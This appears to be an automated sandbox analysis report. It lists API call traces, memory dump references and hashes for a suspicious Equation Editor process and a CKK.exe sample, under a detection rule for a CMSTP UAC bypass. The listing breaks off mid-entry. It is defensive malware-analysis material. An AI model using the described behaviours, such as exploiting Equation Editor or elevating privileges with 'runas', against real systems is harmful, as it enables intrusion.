Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000000F.00000002.837394121.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: ditekSHen
Reputation:	moderate
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	36.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	78.9%
Total number of Nodes:	550
Total number of Limit Nodes:	72

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 0356076E Relevance: 4.6, APIs: 3, Instructions: 119
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 03560792: WriteFile.KERNELBASE(035606E6,035606FD,00000000,00000000,00000000,?,035606FD,035606E6,00000000,00000000,00000000,00000000,0356069F,00000050,00000000), ref: 035607F5

CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0356083C,?,0356081A), ref: 03560874
ExitProcess.KERNELBASE(00000000,?,0356087B,?,0356083C,?,0356081A,?,?,03560801,00000000,00000000,00000000,00000000,0356069F,00000050), ref: 0356088C

Memory Dump Source

Source File: 00000002.00000002.458710488.0000000003560000.00000004.00000020.00020000.00000000.sdmp, Offset: 03560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3560000_EQNEDT32.jbxd

Similarity

API ID: Process$CreateExitFileWrite
String ID:
API String ID: 3739231918-0
Opcode ID: 8902a9f3f46b759cffbabbce9294685ea310c3593259839d3d59cbc6f9c6f742
Instruction ID: 6219c9c861221758e6775670b80362cbfb29ce718c51103c14e014f0d99d7b57
Opcode Fuzzy Hash: 8902a9f3f46b759cffbabbce9294685ea310c3593259839d3d59cbc6f9c6f742
Instruction Fuzzy Hash: D931F47540C3415ACB15EBA4ED81AAEFB69FFC1700F18AD4DA0924B0F2D9B0C5099AE1

Uniqueness

Uniqueness Score: -1.00%

Function 035607AC Relevance: 4.6, APIs: 3, Instructions: 98
processfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteFile.KERNELBASE(035606E6,035606FD,00000000,00000000,00000000,?,035606FD,035606E6,00000000,00000000,00000000,00000000,0356069F,00000050,00000000), ref: 035607F5
CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0356083C,?,0356081A), ref: 03560874
ExitProcess.KERNELBASE(00000000,?,0356087B,?,0356083C,?,0356081A,?,?,03560801,00000000,00000000,00000000,00000000,0356069F,00000050), ref: 0356088C

Memory Dump Source

Source File: 00000002.00000002.458710488.0000000003560000.00000004.00000020.00020000.00000000.sdmp, Offset: 03560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3560000_EQNEDT32.jbxd

Similarity

API ID: Process$CreateExitFileWrite
String ID:
API String ID: 3739231918-0
Opcode ID: d26a8295f2a3bfc1efaa8aa04e95a18b127ffe2b33cb040d0da394256dcd0fb0
Instruction ID: 01dfccfc3fe26ee6af7a64718718370015bae33a110db9f4488d5a671ad5f5b2
Opcode Fuzzy Hash: d26a8295f2a3bfc1efaa8aa04e95a18b127ffe2b33cb040d0da394256dcd0fb0
Instruction Fuzzy Hash: 7121927540C3415ADB11EB64ED80AAFBB69FFC1700F18AD5DB192470F6DAB0C5089BE6

Uniqueness

Uniqueness Score: -1.00%

Function 03560792 Relevance: 4.6, APIs: 3, Instructions: 94
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000002.00000002.458710488.0000000003560000.00000004.00000020.00020000.00000000.sdmp, Offset: 03560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3560000_EQNEDT32.jbxd

Similarity

API ID: Process$CreateExitFileWrite
String ID:
API String ID: 3739231918-0
Opcode ID: c5436491b0ee0ada25d89b9c3df2f49498131499da4c35b77578a281c67f4d9d
Instruction ID: 67b31ba324973819f7934debdcc45dbcac7db156326a5eadd31e12ba6b72318e
Opcode Fuzzy Hash: c5436491b0ee0ada25d89b9c3df2f49498131499da4c35b77578a281c67f4d9d
Instruction Fuzzy Hash: 0B21957140C3416ACB11EB64DC84AAFFBA9FFC1740F18AD5CB192470B5DAB0C5089BE1

Uniqueness

Uniqueness Score: -1.00%

Function 0356057A Relevance: 3.1, APIs: 2, Instructions: 85
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNELBASE(03560568), ref: 0356057A

Part of subcall function 03560593: CreateFileW.KERNELBASE(?,C0000000,00000001,00000000,00000002,00000080,00000000), ref: 0356063F

Memory Dump Source

Source File: 00000002.00000002.458710488.0000000003560000.00000004.00000020.00020000.00000000.sdmp, Offset: 03560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3560000_EQNEDT32.jbxd

Similarity

API ID: CreateExitFileProcess
String ID:
API String ID: 2838702978-0
Opcode ID: 12bbc4865405f4aace8b6125fd16fa87a3e660bb30c286f66737c75c3b4f91f4
Instruction ID: 45cd0627cf366f25e936c8fe2995ea09c2a6a9d2dcd7a4a5c18697876c125f02
Opcode Fuzzy Hash: 12bbc4865405f4aace8b6125fd16fa87a3e660bb30c286f66737c75c3b4f91f4
Instruction Fuzzy Hash: 3C212EB584D3C05FD322C7606EAA794BF60BBA2600F1D86CA81C54F1F3D2A5920A93D6

Uniqueness

Uniqueness Score: -1.00%

Function 0356080D Relevance: 3.1, APIs: 2, Instructions: 70
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000002.00000002.458710488.0000000003560000.00000004.00000020.00020000.00000000.sdmp, Offset: 03560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3560000_EQNEDT32.jbxd

Similarity

API ID: Process$CreateExit
String ID:
API String ID: 126409537-0
Opcode ID: 8231ee5b18957d3648bc57fc975aece0ec9b201bd18f6de92825622497ed5a63
Instruction ID: 477a743597596bfcc60ae269fddf7083ecacf97861d437d2e16adf29210f3ebe
Opcode Fuzzy Hash: 8231ee5b18957d3648bc57fc975aece0ec9b201bd18f6de92825622497ed5a63
Instruction Fuzzy Hash: 7211027540C3415ACB25FB68EC84AAAFB6AFFC0300F18B988E0924B1F6DA70C51497E4

Uniqueness

Uniqueness Score: -1.00%

Function 0356084B Relevance: 3.1, APIs: 2, Instructions: 56
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0356083C,?,0356081A), ref: 03560874

Part of subcall function 03560887: ExitProcess.KERNELBASE(00000000,?,0356087B,?,0356083C,?,0356081A,?,?,03560801,00000000,00000000,00000000,00000000,0356069F,00000050), ref: 0356088C

Memory Dump Source

Source File: 00000002.00000002.458710488.0000000003560000.00000004.00000020.00020000.00000000.sdmp, Offset: 03560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3560000_EQNEDT32.jbxd

Similarity

API ID: Process$CreateExit
String ID:
API String ID: 126409537-0
Opcode ID: cc04445753e1ca6f8d30d3611a3f9dac58b0c92c2cdc5dffd7fbd729de51b4ed
Instruction ID: 5a34fe6d813f0a592e026542f28e4bffaaf823365b6b5be662af9e09187378ce
Opcode Fuzzy Hash: cc04445753e1ca6f8d30d3611a3f9dac58b0c92c2cdc5dffd7fbd729de51b4ed
Instruction Fuzzy Hash: 5201F7E954C34251CB30E638A840BFAA775FBD1340FCCE95BA482071E6D1A481C397D9

Uniqueness

Uniqueness Score: -1.00%

Function 0356082A Relevance: 3.1, APIs: 2, Instructions: 53
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000002.00000002.458710488.0000000003560000.00000004.00000020.00020000.00000000.sdmp, Offset: 03560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3560000_EQNEDT32.jbxd

Similarity

API ID: Process$CreateExit
String ID:
API String ID: 126409537-0
Opcode ID: ab6099e50a1536c03818295e56c65e109917f17f6d534d6b5d930f748458d395
Instruction ID: 4d8bf9bfd2ec818fe763e218ee3b3d5b86708ad41ae8e4484a93954fed5d5631
Opcode Fuzzy Hash: ab6099e50a1536c03818295e56c65e109917f17f6d534d6b5d930f748458d395
Instruction Fuzzy Hash: 8701D6B680C34169DB11E764AC81AAEB76DFFC0300F08AD09A1968B0B6DA70C0159BE5

Uniqueness

Uniqueness Score: -1.00%

Function 0356060F Relevance: 1.6, APIs: 1, Instructions: 126
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000002.00000002.458710488.0000000003560000.00000004.00000020.00020000.00000000.sdmp, Offset: 03560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3560000_EQNEDT32.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 2e77069eac62d2ee9bc9a9e2877012538082cd9b668af7dba8a5dc31d499417e
Instruction ID: d4c47903a70453b8e58b98a18fb0b8ea88a8b557e49151f3adc68078b7a2b1f7
Opcode Fuzzy Hash: 2e77069eac62d2ee9bc9a9e2877012538082cd9b668af7dba8a5dc31d499417e
Instruction Fuzzy Hash: 9D41AA3044D3C12EDA12E7249D6AB59BF74BF83600F1984CEE1814F1F3E69556059766

Uniqueness

Uniqueness Score: -1.00%

Function 035606B9 Relevance: 1.6, APIs: 1, Instructions: 126
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000002.00000002.458710488.0000000003560000.00000004.00000020.00020000.00000000.sdmp, Offset: 03560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3560000_EQNEDT32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ed8813cd8f9cf3f9bf7e7c2c0d1d1f913b80d6dabad10ef7eb689727f7d9572
Instruction ID: e60ecefddac4d2af7318f0e47d2117c34a8ee834c59491efb256e34c07da580d
Opcode Fuzzy Hash: 6ed8813cd8f9cf3f9bf7e7c2c0d1d1f913b80d6dabad10ef7eb689727f7d9572
Instruction Fuzzy Hash: F831E83044C3C66FD712EB649D41B6ABF79BFC2600F18898EF1814B1F2E7659609CB66

Uniqueness

Uniqueness Score: -1.00%

Function 03560659 Relevance: 1.6, APIs: 1, Instructions: 114
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNEL32(03560649), ref: 03560659

Memory Dump Source

Source File: 00000002.00000002.458710488.0000000003560000.00000004.00000020.00020000.00000000.sdmp, Offset: 03560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3560000_EQNEDT32.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: dfcc696a0fb49f4d3319febbc088d39d5c06691e0b131808d8af0196e0dbcac0
Instruction ID: 2da45d6d2a46feef36c14ed958f1c4b73bca9f3153f2007c97633e06c3334665
Opcode Fuzzy Hash: dfcc696a0fb49f4d3319febbc088d39d5c06691e0b131808d8af0196e0dbcac0
Instruction Fuzzy Hash: 4431E02044D3C62ECB12E7349E5AB5ABF74BF83600F1884CEE1820F1F3EA955605D726

Uniqueness

Uniqueness Score: -1.00%

Function 03560705 Relevance: 1.6, APIs: 1, Instructions: 84
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteFile.KERNELBASE(035606E6,035606FD,00000000,00000000,00000000,?,035606FD,035606E6,00000000,00000000,00000000,00000000,0356069F,00000050,00000000), ref: 035607F5

Memory Dump Source

Source File: 00000002.00000002.458710488.0000000003560000.00000004.00000020.00020000.00000000.sdmp, Offset: 03560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3560000_EQNEDT32.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: e52008649e949c67fc193a14be535757e52065788752b6a9b4a718ad1f39f738
Instruction ID: fe94482e7e1a36eb2f395879dcdadea22f85389d1ea748e9f92d795eb0e883e1
Opcode Fuzzy Hash: e52008649e949c67fc193a14be535757e52065788752b6a9b4a718ad1f39f738
Instruction Fuzzy Hash: 9321803040C3866EDB11EB54DD81B6FBBBAFFC1A00F149D5CB1924B0F2EB7596098A65

Uniqueness

Uniqueness Score: -1.00%

Function 03560593 Relevance: 1.6, APIs: 1, Instructions: 81
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000002.00000002.458710488.0000000003560000.00000004.00000020.00020000.00000000.sdmp, Offset: 03560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3560000_EQNEDT32.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 4f4764238bdb60619fe3c07e41298d6882f46444732627a3ff3e30a6068b7b05
Instruction ID: 625780c7ceb878a7e7280ab1e34964135dc959c7d10177b767ca822a6a8e52a0
Opcode Fuzzy Hash: 4f4764238bdb60619fe3c07e41298d6882f46444732627a3ff3e30a6068b7b05
Instruction Fuzzy Hash: 422130B588C3C05FD322D7706EAA791BF64BBE2604F1D86CE80C14F1F3D295900A9396

Uniqueness

Uniqueness Score: -1.00%

Function 035605AF Relevance: 1.6, APIs: 1, Instructions: 69
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000002.00000002.458710488.0000000003560000.00000004.00000020.00020000.00000000.sdmp, Offset: 03560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3560000_EQNEDT32.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: c64e5c60e4163fa49a930f622133e3bd2799c8b2d2f2680db5a4346b252ae6f1
Instruction ID: 34c98720a6bf1ced9a34616cb55ed6e0dfd00659824f8939d9af8bc0f06dda85
Opcode Fuzzy Hash: c64e5c60e4163fa49a930f622133e3bd2799c8b2d2f2680db5a4346b252ae6f1
Instruction Fuzzy Hash: 9D1133B948C3C10FD322D7303EAE781BF64BB92504F0E868E81C54F1F3D29091069296

Uniqueness

Uniqueness Score: -1.00%

Function 03560721 Relevance: 1.6, APIs: 1, Instructions: 64
processfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteFile.KERNELBASE(035606E6,035606FD,00000000,00000000,00000000,?,035606FD,035606E6,00000000,00000000,00000000,00000000,0356069F,00000050,00000000), ref: 035607F5
CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0356083C,?,0356081A), ref: 03560874
ExitProcess.KERNELBASE(00000000,?,0356087B,?,0356083C,?,0356081A,?,?,03560801,00000000,00000000,00000000,00000000,0356069F,00000050), ref: 0356088C

Memory Dump Source

Source File: 00000002.00000002.458710488.0000000003560000.00000004.00000020.00020000.00000000.sdmp, Offset: 03560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3560000_EQNEDT32.jbxd

Similarity

API ID: Process$CreateExitFileWrite
String ID:
API String ID: 3739231918-0
Opcode ID: efe35d33fb53c262e8aff48a2b14a8252caba624d41dc55ac144238288ad08bd
Instruction ID: efd2faa1ce88542c4f4fb160bd14790c6e881a94b1ad891abf34ab45479d56d0
Opcode Fuzzy Hash: efe35d33fb53c262e8aff48a2b14a8252caba624d41dc55ac144238288ad08bd
Instruction Fuzzy Hash: 9D115E3000C34A6ED711EE14DD41FABBBBAFBC0B00F148D1CB191470B1EB7199498BA6

Uniqueness

Uniqueness Score: -1.00%

Function 035605D6 Relevance: 1.5, APIs: 1, Instructions: 48
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000002.00000002.458710488.0000000003560000.00000004.00000020.00020000.00000000.sdmp, Offset: 03560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3560000_EQNEDT32.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: a837bcd9c688a36b9fb585e1bb2c8fcefd4292e0d05c4690dd062954c88e286c
Instruction ID: 0d6f39f30a00699718b721b51f2fca29271a0bb00484c797b0576256ca2eced6
Opcode Fuzzy Hash: a837bcd9c688a36b9fb585e1bb2c8fcefd4292e0d05c4690dd062954c88e286c
Instruction Fuzzy Hash: 8501B1B544C3C01FD322C3706D6EB91BF647F92604F0ECA8E95C44F0E3D2A5910993A6

Uniqueness

Uniqueness Score: -1.00%

Function 03560752 Relevance: 1.5, APIs: 1, Instructions: 41processCOMMON

Download Yara Rule

APIs

Part of subcall function 0356076E: WriteFile.KERNELBASE(035606E6,035606FD,00000000,00000000,00000000,?,035606FD,035606E6,00000000,00000000,00000000,00000000,0356069F,00000050,00000000), ref: 035607F5

CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0356083C,?,0356081A), ref: 03560874
ExitProcess.KERNELBASE(00000000,?,0356087B,?,0356083C,?,0356081A,?,?,03560801,00000000,00000000,00000000,00000000,0356069F,00000050), ref: 0356088C

Memory Dump Source

Source File: 00000002.00000002.458710488.0000000003560000.00000004.00000020.00020000.00000000.sdmp, Offset: 03560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3560000_EQNEDT32.jbxd

Similarity

API ID: Process$CreateExitFileWrite
String ID:
API String ID: 3739231918-0
Opcode ID: ab915c4d70da9f5e50a6ad1d4eaedeb20efed64c161fa0c5c37ea620a5e12464
Instruction ID: 2aaf90c3a9bef401a3c8f2ec77834c3efb1ce17473f72d0b6389cc3473f46a86
Opcode Fuzzy Hash: ab915c4d70da9f5e50a6ad1d4eaedeb20efed64c161fa0c5c37ea620a5e12464
Instruction Fuzzy Hash: BFF0F671008346AFD702EE14DC41F6BBBAAFBC5B40F049D1DB1904B0B1D671D9488BA2

Uniqueness

Uniqueness Score: -1.00%

Function 03560622 Relevance: 1.5, APIs: 1, Instructions: 21fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,C0000000,00000001,00000000,00000002,00000080,00000000), ref: 0356063F

Part of subcall function 03560659: LoadLibraryW.KERNEL32(03560649), ref: 03560659

Memory Dump Source

Source File: 00000002.00000002.458710488.0000000003560000.00000004.00000020.00020000.00000000.sdmp, Offset: 03560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3560000_EQNEDT32.jbxd

Similarity

API ID: CreateFileLibraryLoad
String ID:
API String ID: 2049390123-0
Opcode ID: 6b58b7bea42888d99f99c58fd6019879577d5c0d287c541efadc83ec232d07e8
Instruction ID: 23330bd961f2e2d39fa30b3c36da82f9e341c8f42fda1ea7f99969dfde1b877e
Opcode Fuzzy Hash: 6b58b7bea42888d99f99c58fd6019879577d5c0d287c541efadc83ec232d07e8
Instruction Fuzzy Hash: 36E0127454C3C02AD232D7349D5EF95AE647FC1B04F0DC989A3C49F1E2C6A150049295

Uniqueness

Uniqueness Score: -1.00%

Function 03560887 Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

ExitProcess.KERNELBASE(00000000,?,0356087B,?,0356083C,?,0356081A,?,?,03560801,00000000,00000000,00000000,00000000,0356069F,00000050), ref: 0356088C

Memory Dump Source

Source File: 00000002.00000002.458710488.0000000003560000.00000004.00000020.00020000.00000000.sdmp, Offset: 03560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3560000_EQNEDT32.jbxd

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
Instruction ID: f49c04242a7a61e974833cf8218924656bc711991e28e6f13ed51e74029fe7d2
Opcode Fuzzy Hash: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 0356088E Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.458710488.0000000003560000.00000004.00000020.00020000.00000000.sdmp, Offset: 03560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3560000_EQNEDT32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15c3e4776a16804bb5212a09f03411bf1d00a4b4976dbaad078e0c99fd6b82f5
Instruction ID: 3bc54e68393a0385b23fbab8a7b927d6e3045629c4bc99576ce982e8a57cbb67
Opcode Fuzzy Hash: 15c3e4776a16804bb5212a09f03411bf1d00a4b4976dbaad078e0c99fd6b82f5
Instruction Fuzzy Hash: 71D052312026028FD304EB08D980E13F37AFFD8220B28D668E0004B66AC330E8A2CAD4

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: CKK.exePID: 3052, Parent PID: 1012COMMON

Execution Graph

Execution Coverage:	3.3%
Dynamic/Decrypted Code Coverage:	0.4%
Signature Coverage:	3.2%
Total number of Nodes:	2000
Total number of Limit Nodes:	67

Executed Functions

Function 009F42DE Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 235
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 009F430D

Part of subcall function 009F6B57: _wcslen.LIBCMT ref: 009F6B6A

GetCurrentProcess.KERNEL32(?,00A8CB64,00000000,?,?), ref: 009F4422
IsWow64Process.KERNEL32(00000000,?,?), ref: 009F4429
LoadLibraryA.KERNEL32(kernel32.dll), ref: 009F4454
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo,?,?), ref: 009F4466
GetNativeSystemInfo.KERNEL32(?,?,?), ref: 009F4474
FreeLibrary.KERNEL32(00000000,?,?), ref: 009F447B
GetSystemInfo.KERNEL32(?,?,?), ref: 009F44A0

Strings

GetNativeSystemInfo, xrefs: 009F4460
|O, xrefs: 00A336F8
kernel32.dll, xrefs: 009F444F

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
String ID: GetNativeSystemInfo$kernel32.dll$|O
API String ID: 3290436268-3101561225
Opcode ID: 59d3561e99c221c7b9f3929946a67dbb48ab296654a602d3019ef4b58ccd4e90
Instruction ID: 58bf95bd06ffcada4f669d7ffdae525ef5af588af84e234d34f29e720c1389ae
Opcode Fuzzy Hash: 59d3561e99c221c7b9f3929946a67dbb48ab296654a602d3019ef4b58ccd4e90
Instruction Fuzzy Hash: 33A1E572B1E2C4CFCB52D7E97C859A63FE46B63308B065998E041AFB23D234450BDB21

Uniqueness

Uniqueness Score: -1.00%

Function 009F42A2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 009F42B2
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,009F50AA,?,?,00000000,00000000), ref: 009F42C9
LoadResource.KERNEL32(?,00000000,?,?,009F50AA,?,?,00000000,00000000,?,?,?,?,?,?,009F4F20), ref: 00A335BE
SizeofResource.KERNEL32(?,00000000,?,?,009F50AA,?,?,00000000,00000000,?,?,?,?,?,?,009F4F20), ref: 00A335D3
LockResource.KERNEL32(009F50AA,?,?,009F50AA,?,?,00000000,00000000,?,?,?,?,?,?,009F4F20,?), ref: 00A335E6

Strings

SCRIPT, xrefs: 009F42BF

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: 35cdc09542428b1829dd8c533f441afc20f6771a5fc709e672f2573f93471bf3
Instruction ID: 87e08c03e16c4d77d6bd6ca3aaf8e98d1f1deff7aba23d8c55ee9c4c4b06e8d8
Opcode Fuzzy Hash: 35cdc09542428b1829dd8c533f441afc20f6771a5fc709e672f2573f93471bf3
Instruction Fuzzy Hash: 9C117971200704BFEB219BA5DC48FA77BBDEBC5B61F208569B512966A0EB71D8018B30

Uniqueness

Uniqueness Score: -1.00%

Function 00A32BA5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetCurrentDirectoryW.KERNEL32(?), ref: 009F2B6B

Part of subcall function 009F3A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00AC1418,?,009F2E7F,?,?,?,00000000), ref: 009F3A78

Part of subcall function 009F9CB3: _wcslen.LIBCMT ref: 009F9CBD

GetForegroundWindow.USER32 ref: 00A32C10
ShellExecuteW.SHELL32(00000000,?,?,00AB2224), ref: 00A32C17

Strings

runas, xrefs: 00A32C0B

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
String ID: runas
API String ID: 448630720-4000483414
Opcode ID: 0f4433c44bb2cd484448acaa67a936d4febe723f904db34f2b62d36f17a4c66d
Instruction ID: 41d9ff13bb167e99d790ef6f6a00f1be03e2ab0b5133200623d84857eb5a0eb6
Opcode Fuzzy Hash: 0f4433c44bb2cd484448acaa67a936d4febe723f904db34f2b62d36f17a4c66d
Instruction Fuzzy Hash: 1211B1312083096AC705FF70D852FBEBBA8ABD2351F44582DF686520A3DF758A4A8712

Uniqueness

Uniqueness Score: -1.00%

Function 00A5DBBE Relevance: 6.0, APIs: 4, Instructions: 29filestringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,00A35222), ref: 00A5DBCE
GetFileAttributesW.KERNELBASE(?), ref: 00A5DBDD
FindFirstFileW.KERNELBASE(?,?), ref: 00A5DBEE
FindClose.KERNEL32(00000000), ref: 00A5DBFA

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: FileFind$AttributesCloseFirstlstrlen
String ID:
API String ID: 2695905019-0
Opcode ID: 6b8a0dbee5a66e23a4f127c7ca193a8ad59b3c4ed016d196f9dbcaecbe11a7ed
Instruction ID: b385cc54c271aaaf1b725f90961d515ac1b5b1df539baeb54d1362b1bd9921c7
Opcode Fuzzy Hash: 6b8a0dbee5a66e23a4f127c7ca193a8ad59b3c4ed016d196f9dbcaecbe11a7ed
Instruction Fuzzy Hash: 88F03031814914A7C230ABB8AD4D8AE77ACAE41336B544706F876C21E0FBB0595A8AA5

Uniqueness

Uniqueness Score: -1.00%

Function 00A2333F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30timeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(00000000,00A1E505), ref: 00A2337E

Strings

GetSystemTimePreciseAsFileTime, xrefs: 00A23350, 00A2335A

Memory Dump Source

